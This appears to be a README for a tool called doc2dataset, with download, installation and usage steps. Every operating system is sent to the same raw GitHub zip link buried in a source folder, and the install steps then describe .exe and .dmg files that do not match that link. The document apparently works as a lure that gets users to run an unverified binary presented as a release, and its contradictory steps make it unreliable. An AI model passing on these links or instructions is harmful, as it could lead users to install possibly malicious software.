Welcome to doc2dataset! This application helps you generate datasets from documents easily. Follow these steps to get started.
Before you download, ensure your computer meets these requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or Linux (any recent version)
- RAM: At least 4GB recommended
- Disk Space: 500MB of free space
- Internet Connection: Required for downloads and updates
-
Visit the Releases Page: Go to this page to download.
-
Choose the Version: Locate the latest version of
doc2dataset. You will see a list of files available for download. -
Select Your File: Click on the appropriate file for your operating system:
- For Windows, download
https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip. - For macOS, download
https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip. - For Linux, choose
https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
- For Windows, download
-
Run the Installer:
- Windows: Double-click the
.exefile and follow the prompts to install. - macOS: Open the
.dmgfile and drag the app to your Applications folder. - Linux: Extract the
https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zipfile and run the application.
- Windows: Double-click the
-
Launch the Application: After installation, open
doc2datasetfrom your applications or start menu.
Using doc2dataset is straightforward:
-
Prepare Your Documents: Gather the documents you want to process. Ensure they are in a supported format (PDF, DOCX, or TXT).
-
Open the Application: Launch
doc2dataset. -
Select Your Files: Use the "Choose Files" button to select the documents you want to convert into a dataset.
-
Set Parameters: Adjust any settings to meet your needs. You can set options such as:
- Output format (CSV, JSON, etc.)
- Include or exclude specific sections
- Number of documents to process
-
Start the Process: Click the "Generate Dataset" button. The application will begin processing your documents. A progress bar will show you how far along the process is.
-
Access Your Dataset: Once completed, the application will provide a download link for your dataset file. Save it to your desired location.
- Token Efficiency: Works with less data for effective results.
- Multi-Framework Outputs: Easy integration with various machine learning frameworks.
- Numeric Integrity: Leverages NumGuard to maintain data accuracy.
- User-Friendly Interface: Designed for ease of use, even for non-technical users.
- Batch Processing: Process multiple documents at once to save time.
- Regular Updates: Check for updates often to ensure you have the latest features and improvements.
- Explore Settings: Familiarize yourself with the settings for optimal performance based on your specific needs.
If you encounter issues:
- Installation Problems: Ensure your system meets the requirements listed above.
- File Format Errors: Verify that your documents are in a supported format.
- Performance Issues: Close other applications to free up memory.
If you have questions or need assistance, feel free to reach out. You can contact the developer on GitHub or visit the discussion forum linked in the repository.
For more information on features and updates, visit our official documentation. You can also explore the community discussions for shared tips and experiences.
Thank you for choosing doc2dataset! We hope it simplifies your data generation tasks.